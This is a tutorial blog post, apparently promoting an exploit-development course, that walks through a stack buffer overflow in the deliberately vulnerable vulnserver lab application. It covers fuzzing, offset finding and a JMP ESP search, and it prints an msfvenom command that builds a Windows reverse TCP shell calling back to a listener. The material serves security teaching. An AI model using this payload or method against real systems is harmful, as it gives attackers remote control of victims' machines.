Recap: Exploring Buffer Overflows with vulnserver

In our last deep dive, we tackled a critical concept in exploit development—identifying and exploiting a buffer overflow in the vulnserver application, specifically targeting the TRUN command.

Fuzzing the TRUN Command

We began by sending varying lengths of “A” characters to the TRUN command, gradually increasing from 50 to 5000. When we hit 5000, the application crashed. Upon investigation, we discovered the EIP register was overwritten with 41414141—hexadecimal for “AAAA.” This was our first indication of a buffer overflow vulnerability.

Creating and Using a Unique Pattern

To pinpoint where the overflow occurred, we utilized Metasploit’s pattern_create.rb to generate a unique pattern, which we sent to the server. After another crash, we observed the EIP was filled with a specific 4-byte value from our pattern.

Finding the Exact Offset

Using pattern_offset.rb, we determined that the overflow began after 2006 characters, giving us precise control over the buffer and EIP register.

Proving the Concept

To confirm, we crafted a script that sent 2006 “A” characters followed by 4 “B” characters to overwrite the EIP, and the rest with “C” characters. The result? The EIP was successfully overwritten with our “B”s, proving we had control.

What’s Next: Injecting Shellcode

In the next phase, we’re going to leverage our control over the instruction pointer to inject shellcode and execute it on the server. This involves:

Finding a Place for Shellcode

Our next goal is to locate a suitable spot in memory—ideally the stack—where we can place our shellcode. We’ll use the JMP ESP instruction to jump to the stack.

Steps to Follow:

  1. Starting vulnserver and Immunity Debugger:
  • Launch vulnserver and attach it to Immunity Debugger.
  1. Searching for JMP ESP:
  • Run the program in Immunity Debugger, search for the JMP ESP instruction, and note the address. For example, you might find it in kernel32.dll at 7DD93132.
  1. Considering ASLR:
  • Keep in mind that addresses in system libraries like kernel32.dll can change due to ASLR. For consistent results, consider using an application-specific library.
  1. Editing the Exploit Script:
  • Update your script with the JMP ESP address and prepare to inject the shellcode.

Get Access to Full Course with Discount : https://www.udemy.com/course/shellcode/?referralCode=0325C23C709D65C99EC0

Generating Shellcode with msfvenom

We’ll use msfvenom to generate the shellcode. Here’s a breakdown of the command:

msfvenom -a x86 -platform Windows -p windows/shell_reverse_tcp -b '\x00\x0A\x0D' LHOST=192.168.197.133 LPORT=4321 -f python
  • -a x86: Targeting a 32-bit architecture.
  • -platform Windows: Generating shellcode for Windows.
  • -p windows/shell_reverse_tcp: Creating a reverse TCP shell payload.
  • -b '\x00\x0A\x0D': Avoiding bad characters.
  • LHOST: Setting your IP address.
  • LPORT: Defining the listening port.
  • -f python: Outputting the shellcode in Python format for easy integration.

Once generated, this shellcode will be injected into vulnserver, granting us remote control via a reverse shell.

For more in-depth guidance and a hands-on demonstration, check out our video below.

OCSALY